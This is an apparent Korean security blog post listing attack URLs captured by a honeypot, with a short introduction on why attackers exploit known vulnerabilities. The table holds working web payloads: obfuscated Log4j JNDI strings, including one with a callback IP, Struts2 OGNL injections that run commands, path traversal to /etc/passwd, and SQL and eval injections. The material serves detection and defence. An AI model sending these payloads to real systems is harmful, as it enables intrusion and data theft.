반응형
자주 탐지되는 소프트웨어 취약점 공격 URL URI
취약점 공격
대외서비스를 위해 외부에 노출되어 있는 시스템이라면 매일같이 이미 알려진 취약점을 활용한 공격 트래픽이 많이 유입되고 탐지됩니다. 서비스를 운영 특성상 서비스 포트는 항상 열려 있어야 하기 때문에 서비스 관련 취약점 관리는 더욱 중요합니다.
이미 알려진 취약점의 경우 최신 패치 또는 보안 패치를 통해 대응이 가능하나
대외 서비스의 영향도, 기존에 운영되고 있는 소프트웨어 호환성 등 패치를 위해 고려해야 할 사항이 많아지고 취약점 패치 이후 어떤 일이 벌어질 지 모르기에 취약점 패치를 하지 않거나 취약점 관련 설정을 통해 임시적으로 대응하는 것을 많이 볼 수 있습니다.
그렇다면 공격자는 왜 알려진 취약점을 이용하는 것일까
- 얻어 걸려라 마인드 ! : 취약점 패치를 하지 않는 시스템은 어디에나 있기에 무작위로 뿌려대며 얻어 걸려라!
- 취약점 코드를 구하기 쉬움 : 구글에 제품이름, 취약점 코드 poc 또는 github 으로만 검색해도 많이 나오고 툴 또한 많이 나옵니다.
- 공격 대상의 정보 수집 : 공격 트래픽의 응답 결과를 분석하여 공격 대상의 시스템 정보를 파악할수도 있습니다.
허니팟에서 탐지된 트래픽
| 카테고리 (제품/벤더/서비스) | URL 또는 URI |
| Log4j | ${jndi:ldap:/ |
| Log4j | ${jndi:ldap:/ |
| Log4j | ${${::-j}${::-n}${::-d}${::-i}${::-:}${::-l}${::-d}${::-a}${::-p}${::-:}${::-/ |
| Log4j | ${${::-j}${::-n}${::-d}${::-i}${::-:}${::-l}${::-d}${::-a}${::-p}${::-:}${::-/ |
| Log4j | ${jndi:ldap:/ |
| Log4j | ${jndi:ldap:/ |
| Zyxel FW | /ztp/cgi-bin/handler |
| FineReport | /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml |
| Apache weaver | /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet |
| VPN | /vpn/index.html |
| PHP Unit | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| API | /v2/keys/nzvslebxxuuejuqqkqfatsvfhyuyombw?dir=true |
| API | /v2/api-docs |
| Web | /users?page&size=5 |
| Panwei e-cology | /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager |
| Ueditor | /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 |
| UFIDA Chanjet T+ | /tplus/SM/SetupAccount/Upload.aspx?preload=1 |
| Sapido Router | /syscmd.htm |
| Korenix JetWave | /syscmd.asp |
| Spring | /swagger-ui.html |
| Spring | /swagger-resources |
| Apache Solr | /solr/admin/cores?wt=json |
| Apache Solr | /solr/admin/cores?wt=json |
| HCM SQL | /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 |
| Jenkins | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl |
| ThinkPHP | /Runtime/Logs/Index/23_11_06.log |
| ThinkPHP | /Runtime/Logs/Home/23_11_06.log |
| ThinkPHP | /Runtime/Logs/Common/23_11_06.log |
| ThinkPHP | /Runtime/Logs/App/23_11_06.log |
| ThinkPHP | /Runtime/Logs/23_11_06.log |
| ThinkPHP | /runtime/log/202311/06.log |
| ThinkPHP | /runtime/log/202311/06_sql.log |
| ThinkPHP | /runtime/log/202311/06_error.log |
| ThinkPHP | /runtime/log/202311/06_cli.log |
| Panwei e-cology | /rest/ofs/ReceiveCCRequestByXml |
| Panwei e-cology | /rest/ofs/deleteUserRequestInfoByXml |
| Panwei e-cology | /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml |
| Finetree 5MP | /quicksetup/user_pop.php?method=add |
| ShopXO | /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= |
| ShopXO | /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= |
| Pentago | /pentaho/api/repos/dashboards/editor?command=executeQuery&datasource=pentaho_operations_mart&query=select%20encode('gvbltrvu','base64')&require-cfg.js |
| PandoraFMS | /pandora_console/index.php?pure=0&sec=netf&sec2=operation/netflow/nf_live_view |
| MinIO | /minio/webrpc |
| MinIO | /minio/bootstrap/v1/verify |
| /metrics | |
| /mappings | |
| Tomcat | /manager/status.xsd |
| Tomcat | /manager/server.xml%EF%BC%8C%EF%BC%9B |
| Tomcat | /manager/logging.properties |
| Tomcat | /manager/html |
| Tomcat | /manager/context.xml |
| Spring boot logview | /manage/log/view?filename=/Windows/win.ini&base=../../../../../../../../../../../../ |
| Spring boot logview | /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../../../ |
| Coremail | /mailsms/s?dumpConfig=/&func=ADMIN:appState |
| Unisoc | /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1))) |
| Bihaiwei L7 | /login.php?action=login&type=admin |
| Spring | /login.do?message=4501*5282 |
| Spring boot logview | /log/view?filename=/Windows/win.ini&base=../../../../../../../../../../../../ |
| Spring boot logview | /log/view?filename=/etc/passwd&base=../../../../../../../../../../ |
| Kindeditor | /kindeditor/php/upload_json.php?dir=file |
| Kindeditor | /kindeditor/jsp/upload_json.jsp?dir=file |
| Kindeditor | /kindeditor/asp/upload_json.asp?dir=file |
| Kindeditor | /kindeditor/asp.net/upload_json.ashx?dir=file |
| Kindeditor | /jsp/upload_json.jsp?dir=file |
| ThinkPHP | /index.php/Index/%5Cthink%5Capp/invokefunction |
| ThinkPHP | /index.php/captcha |
| ThinkPHP | /index.php?s=captcha |
| ThinkPHP | /index.php?s=/Index/thinkapp/invokefunction |
| ThinkPHP | /index.php?s=/aa/bb/name/${@printf(64888*254791)} |
| Metinfo | /include/thumb.php?dir=http..adminloginlogin_check.php |
| H3C IMC | /imc/javax.faces.resource/dynamiccontent.properties.xhtml |
| Dahua ICC readPic | /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd |
| Dahua ICC readPic | /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd |
| Spring boot Druid | /druid/submitLogin |
| Ruoyi | /common/download/resource?resource=/profile/../../../../Windows/win.ini |
| Ruoyi | /common/download/resource?resource=/profile/../../../../etc/passwd |
| Seacms | /comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E |
| XMLRPC API | /cobbler_api |
| CGI | /cgi-bin/test/test.cgi |
| CGI | /cgi-bin/configure/set_link_neg?LD_PRELOAD=/proc/self/fd/0 |
| CGI | /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd |
| CGI | /cgi-bin/../../../../../../../../../../../../etc/passwd |
| Jitong EWEBS | /casmain.xgi |
| Xunyou cms | /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php |
| Apache Axis | /axis2/axis2-web/HappyAxis.jsp |
| Kindeditor | /asp/upload_json.asp?dir=file |
| Kindeditor | /asp.net/upload_json.ashx?dir=file |
| D-Link | /apply_sec.cgi |
| ThinkPHP | /Application/Runtime/Logs/Test/23_xx_xx.log |
| ThinkPHP | /Application/Runtime/Logs/Service/23_xx_xx.log |
| ThinkPHP | /Application/Runtime/Logs/Index/23_xx_xx.log |
| ThinkPHP | /Application/Runtime/Logs/Home/23_xx_xx.log |
| ThinkPHP | /Application/Runtime/Logs/Ext/23_xx_xx.log |
| ThinkPHP | /Application/Runtime/Logs/Common/23_xx_xx.log |
| ThinkPHP | /Application/Runtime/Logs/App/23_xx_xx.log |
| ThinkPHP | /Application/Runtime/Logs/Api/23_xx_xx.log |
| ThinkPHP | /Application/Runtime/Logs/Admin/23_xx_xx.log |
| ThinkPHP | /Application/Runtime/Logs/23_xx_xx.log |
| ThinkPHP | /App/Runtime/Logs/Index/23_xx_xx.log |
| ThinkPHP | /App/Runtime/Logs/Home/23_xx_xx.log |
| ThinkPHP | /App/Runtime/Logs/Admin/23_xx_xx.log |
| ThinkPHP | /App/Runtime/Logs/23_xx_xx.log |
| Apache Apisix | /apisix/batch-requests |
| Apache Freemarker | /ajax/email/template/preview |
| Web admin page | /admin/index.php |
| Spring boot_CAS | /actuator/trace |
| Spring boot_CAS | /actuator/threaddump |
| Spring boot_CAS | /actuator/status |
| Spring boot_CAS | /actuator/statistics |
| Spring boot_CAS | /actuator/ssoSessions |
| Spring boot_CAS | /actuator/sso |
| Spring boot_CAS | /actuator/springWebflow |
| Spring boot_CAS | /actuator/shutdown |
| Spring boot_CAS | /actuator/sessions |
| Spring boot_CAS | /actuator/scheduledtasks |
| Spring boot_CAS | /actuator/resolveAttributes |
| Spring boot_CAS | /actuator/releaseAttributes |
| Spring boot_CAS | /actuator/registeredServices |
| Spring boot_CAS | /actuator/refresh |
| Spring boot_CAS | /actuator/metrics |
| Spring boot_CAS | /actuator/mappings |
| Spring boot_CAS | /actuator/management |
| Spring boot_CAS | /actuator/loggingConfig |
| Spring boot_CAS | /actuator/loggers |
| Spring boot_CAS | /actuator/logfile |
| Spring boot_CAS | /actuator/liquibase |
| Spring boot_CAS | /actuator/jolokia/list |
| Spring boot_CAS | /actuator/jolokia |
| Spring boot_CAS | /actuator/integrationgraph |
| Spring boot_CAS | /actuator/hystrix.stream |
| Spring boot_CAS | /actuator/httptrace |
| Spring boot_CAS | /actuator/heapdump |
| Spring boot_CAS | /actuator/healthcheck |
| Spring boot_CAS | /actuator/gateway/routes/ntpmfqabwc |
| Spring boot_CAS | /actuator/gateway/routes/nmpsupintx |
| Spring boot_CAS | /actuator/flyway |
| Spring boot_CAS | /actuator/features |
| Spring boot_CAS | /actuator/exportRegisteredServices |
| Spring boot_CAS | /actuator/events |
| Spring boot_CAS | /actuator/env |
| Spring boot_CAS | /actuator/dump |
| Spring boot_CAS | /actuator/configurationMetadata |
| Spring boot_CAS | /actuator/configprops |
| Spring boot_CAS | /actuator/conditions |
| Spring boot_CAS | /actuator/caches |
| Spring boot_CAS | /actuator/beans |
| Spring boot_CAS | /actuator/auditLog |
| Log4j | /$%7Bjndi:ldap[:]//211.157.134[.]218:1056/1a80c79119000z098bhgxzshvz%7D |
| Apache Struts2 | /%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D),%23wr.print(%23parameters.content%5B1%5D),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=<Struts2-vuln-&content=Check> |
| Apache Struts2 | /%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs%3D@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=set+/a+12471914-1192072 |
| Apache Struts2 | /%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs%3D@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=expr+12471914+-+1192072 |
| Apache Struts2 | /%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28%27%3CStruts2-vuln-%27%29%29.%28%23w.print%28%27Check%3E%27%29%29.%28%23w.close%28%29%29%7D/ |
| Apache Struts2 | /%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28%27%3CStruts2-vuln-%27%29%29.%28%23w.print%28%27Check%3E%27%29%29.%28%23w.close%28%29%29%7D/ |
| Apache Struts2 | /%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C'Struts2-vuln-'%2B'Check'%7D.do |
| Apache Struts2 | /%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C'Struts2-vuln-'%2B'Check'%7D.action |
| Apache Struts2 | /%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%23xx%3D123%2C%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter%28%29%2C%23wr.print%28%23parameters.c1%5B0%5D%29%2C%23wr.print%28%23parameters.c2%5B0%5D%29%2C%23wr.close%28%29%2C%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=1&c1=Struts2-vuln&c2=-Check |
| linux passwd | /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd |
| linux passwd | /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd |
| linux passwd | /../../../../../../../../../../../../etc/passwd |
| Log4j | /?x=${XXX:${${X::-jn}${X::-di}:${X::-l}d${X::-a}p:${X::-/}${X::-/}:/3sEIUFAwQsqejpPxhr1bES} |
| Log4j | /?x=${jndi:ldap:${::-/}${::-/}:/3sEIUFAwQsqejpPxhr1bES} |
| Log4j | /?x=${jndi:ldap://:/3sEIUFAwQsqejpPxhr1bES} |
| Log4j | /?x=${${X::-j}ndi:rmi:${::-/}${X::-/}:/3sEIUFAwQsqejpPxhr1bES} |
| Apache Struts2 | /?redirect:$%7B%23a%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3D%23a.getRealPath(%22%3CStruts2-vuln-%22),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().print(%23b),%23matt.getWriter().print('Check%3E'),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D |
| Apache Struts2 | /?method%3A%23_memberAccess%3D@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2C%23kxlzx%3D+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23kxlzx.println%2810219141+-+1416274%29%2C%23kxlzx.close |
| Apache Struts2 | /?method%3A%23_memberAccess%3D@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2C%23kxlzx%3D+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23kxlzx.println%2810219141+-+1416274%29%2C%23kxlzx.close |
| Apache Struts2 | /?debug=command&expression=%23out%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23out.getWriter().print('Struts2-vuln-'),%23out.getWriter().print('Check'),%23out.getWriter().flush(),%23out.getWriter().close() |
| Apache Struts2 | /?debug=command&expression=%23out%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23out.getWriter().print('Struts2-vuln-'),%23out.getWriter().print('Check'),%23out.getWriter().flush(),%23out.getWriter().close() |
| Apache Struts2 | /?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest(),%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23resp.print('Struts2-vuln-'),%23resp.print('Check'),%23resp.close() |
| Apache Struts2 | /?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest(),%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23resp.print('Struts2-vuln-'),%23resp.print('Check'),%23resp.close() |
| Apache Struts2 | /?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%23s%3Dnew%20java.lang.String(%22Struts2-vuln-%22%2B%22Check%22)%2C%40org.apache.commons.io.IOUtils%40toString(%23s.getBytes())) |
| Apache Struts2 | /?debug=browser&object=%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C%23res%3D@org.apache.struts2.ServletActionContext@getResponse%28%29%2C%23w%3D%23res.getWriter%28%29%2C%23w.print%28%27<Struts2-vuln%27%2B%27-Check>%27%29%29 |
| Apache Struts2 | /?debug=browser&object=(%23mem%3D%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)%3F%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.othersword[0]%2B'-Check>')%3Axx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&othersword=<Struts2-vuln |
| Apache Struts2 | /?debug=browser&object=(%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse(),%23path%3D%23req.getRealPath(%23parameters.pp[0]),%23w%3D%23res.getWriter(),%23w.print(%23path),%23w.print('Check>'))&pp=Struts2-vuln- |
| Spring4Shell | /?class.module.classLoader.resources.context.configFile&class.module.classLoader.resources.context.configFile.content.aaa=xxx |
| Apache Struts2 | /?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('Struts2-vuln-'%2B'Check')%2C%23out.close()%7D |
| Apache Struts2 | /?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('Struts2-vuln-'%2B'Check')%2C%23out.close()%7D |
반응형
'IT 보안' 카테고리의 다른 글
| 다크넷(Darknet) 정보 사이트 모음 (0) | 2024.09.22 |
|---|---|
| IDS 룰 종류 및 설명 (0) | 2024.09.22 |
| 서비스 거부/분산 서비스 거부 공격 (DoS/DDoS 공격) (3) | 2024.09.22 |
| Anti-VM 악성코드 분석 방법 (0) | 2024.09.22 |
| exploit DB - GHDB 카테고리 (0) | 2024.08.29 |
